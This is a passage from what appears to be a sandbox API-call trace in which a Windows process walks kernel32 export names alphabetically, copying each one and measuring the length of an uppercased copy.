returned="Basep8BitStringToDynamicUnicodeString" [0078.252] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0078.252] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0078.252] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0078.252] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0078.252] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0078.252] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0078.252] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0078.252] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0078.252] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0078.252] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0078.252] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0078.252] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0078.252] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0078.252] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0078.252] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0078.252] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0078.252] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0078.252] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0078.252] lstrlenA (lpString="BEEP") returned 4 [0078.252] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0078.252] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0078.252] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0078.252] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0078.252] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0078.252] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0078.252] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0078.252] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0078.252] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0078.252] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0078.252] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0078.252] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0078.252] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0078.252] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0078.252] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0078.253] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0078.253] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0078.253] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0078.253] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0078.253] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0078.253] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0078.253] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0078.253] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0078.253] lstrlenA (lpString="CANCELIO") returned 8 [0078.253] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0078.253] lstrlenA (lpString="CANCELIOEX") returned 10 [0078.253] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0078.253] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0078.253] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0078.253] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0078.253] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0078.253] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0078.253] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0078.253] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0078.253] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0078.253] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0078.253] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0078.253] lstrlenA (lpString="CHECKELEVATION") returned 14 [0078.253] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0078.253] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0078.253] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0078.253] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0078.253] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0078.253] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0078.253] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0078.253] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0078.253] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0078.253] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0078.253] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0078.253] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0078.253] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0078.254] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0078.254] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0078.254] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0078.255] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0078.255] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0078.255] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0078.255] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0078.255] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0078.255] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0078.255] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0078.255] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0078.255] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0078.256] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0078.256] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0078.256] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0078.256] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0078.256] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0078.256] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0078.256] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0078.256] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0078.256] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0078.256] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0078.256] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0078.256] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0078.256] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0078.256] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0078.256] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0078.256] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0078.256] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0078.256] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0078.256] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0078.256] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0078.256] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0078.256] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0078.256] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0078.256] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0078.256] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0078.256] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0078.256] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0078.256] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0078.256] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0078.256] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0078.256] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0078.256] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0078.256] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0078.256] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0078.256] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0078.257] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0078.257] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0078.257] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0078.257] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0078.257] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0078.257] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0078.257] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0078.257] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0078.257] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0078.257] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0078.257] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0078.257] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0078.257] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0078.257] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0078.257] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0078.257] lstrlenA (lpString="COPYCONTEXT") returned 11 [0078.257] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0078.257] lstrlenA (lpString="COPYFILEA") returned 9 [0078.257] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0078.257] lstrlenA (lpString="COPYFILEEXA") returned 11 [0078.257] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0078.257] lstrlenA (lpString="COPYFILEEXW") returned 11 [0078.257] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0078.257] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0078.257] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0078.257] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0078.257] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0078.257] lstrlenA (lpString="COPYFILEW") returned 9 [0078.257] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0078.257] lstrlenA (lpString="COPYLZFILE") returned 10 [0078.257] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0078.257] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0078.257] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0078.257] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0078.257] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0078.257] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0078.258] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0078.258] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0078.258] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0078.258] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0078.258] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0078.258] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0078.258] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0078.258] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0078.258] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0078.258] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0078.258] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0078.258] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0078.258] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0078.258] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0078.258] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0078.258] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0078.258] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0078.258] lstrlenA (lpString="CREATEEVENTA") returned 12 [0078.258] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0078.258] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0078.258] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0078.258] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0078.258] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0078.258] lstrlenA (lpString="CREATEEVENTW") returned 12 [0078.258] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0078.258] lstrlenA (lpString="CREATEFIBER") returned 11 [0078.258] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0078.258] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0078.258] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0078.258] lstrlenA (lpString="CREATEFILEA") returned 11 [0078.258] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0078.258] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0078.258] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0078.258] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0078.258] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0078.258] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0078.258] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0078.258] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0078.259] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0078.259] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0078.259] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0078.259] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0078.259] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0078.259] lstrlenA (lpString="CREATEFILEW") returned 11 [0078.259] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0078.259] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0078.259] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0078.259] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0078.259] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0078.259] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0078.259] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0078.259] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0078.259] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0078.259] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0078.259] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0078.259] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0078.259] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0078.259] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0078.259] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0078.259] lstrlenA (lpString="CREATEJOBSET") returned 12 [0078.259] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0078.259] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0078.259] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0078.259] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0078.259] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0078.259] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0078.259] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0078.259] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0078.259] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0078.259] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0078.259] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0078.259] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0078.259] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0078.259] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0078.259] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0078.260] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0078.260] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0078.260] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0078.260] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0078.260] lstrlenA (lpString="CREATEPIPE") returned 10 [0078.260] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0078.260] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0078.260] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0078.260] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0078.260] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0078.260] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0078.260] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0078.260] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0078.260] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0078.260] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0078.260] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0078.260] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0078.260] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0078.260] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0078.260] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0078.260] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0078.260] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0078.260] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0078.260] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0078.260] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0078.260] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0078.260] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0078.260] 